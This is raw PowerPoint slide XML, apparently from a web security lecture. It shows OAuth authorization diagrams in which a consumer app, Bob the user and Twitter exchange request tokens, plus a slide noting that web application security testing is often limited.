            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1930307" y="2998826"/>
            <a:ext cx="2046181" cy="1569999"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4897887" y="4713188"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14"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2483" y="4568825"/>
            <a:ext cx="609600" cy="871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1880394"/>
            <a:ext cx="609600" cy="871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0854" y="1877219"/>
            <a:ext cx="609600" cy="871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TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2624652" y="2211812"/>
            <a:ext cx="2460930" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, can you post </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to my Twitter feed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092307" y="4771042"/>
            <a:ext cx="1737450" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Yup, let me get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>permission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5022476" y="5067131"/>
            <a:ext cx="1801319" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Twitter, I need </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a request token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6498384" y="3479925"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6771443" y="3743662"/>
            <a:ext cx="2310248" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, here is your</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>request token and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32961018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219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How OAuth Works - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Part 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="571537" y="5584726"/>
            <a:ext cx="945692" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Consumer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6715908" y="2715419"/>
            <a:ext cx="1399392" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Service Provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1403450" y="2748757"/>
            <a:ext cx="526857" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2331542" y="1523036"/>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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1400130" y="4645601"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1981200" y="2312988"/>
            <a:ext cx="5129654" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="24" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1032650" y="3248894"/>
            <a:ext cx="634229" cy="1464294"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2412614" y="3767490"/>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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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850" y="4713188"/>
            <a:ext cx="609600" cy="871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1"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1880394"/>
            <a:ext cx="609600" cy="871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0854" y="1877219"/>
            <a:ext cx="609600" cy="871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 name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2921479" y="1605102"/>
            <a:ext cx="4207502" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Twitter, I need to authorize this request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>token that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> gave me.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679157" y="4651864"/>
            <a:ext cx="3268530" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bob, here is a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>request token.  Take it to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Twitter and approve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2869613" y="3880885"/>
            <a:ext cx="2171889" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Twitter, yes please!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6117384" y="2524919"/>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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2342865" y="2905919"/>
            <a:ext cx="4602472" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bob, you want to authorize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to do A, B, and C with your Twitter feed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7743067" y="4021585"/>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9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827745" y="4328269"/>
            <a:ext cx="4602472" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bob, ok.  Tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> they have permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to use their request token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1146772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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Current Web App Security Testing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is Often Limited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1661160"/>
            <a:ext cx="8153400" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many enterprises test only the business functionality of applications deployed to the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Rarely is security tested</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This becomes obvious when you examine the daily reports on vulnerability mailing lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Open Source Vulnerability Database (www.osvdb.org) includes a large number of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The majority of new reports focus on web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The XSS Information and Archive (http://xssed.com/) also lists sites found to be vulnerable to web flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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9075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How OAuth Works – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Part 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1234569" y="5538458"/>
            <a:ext cx="945692" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Consumer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6715908" y="2715419"/>
            <a:ext cx="1399392" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Service Provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1403450" y="2748757"/>
            <a:ext cx="526857" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2331542" y="1904036"/>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10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3073816" y="4332188"/>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11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1930307" y="2425675"/>
            <a:ext cx="5180547" cy="2333650"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
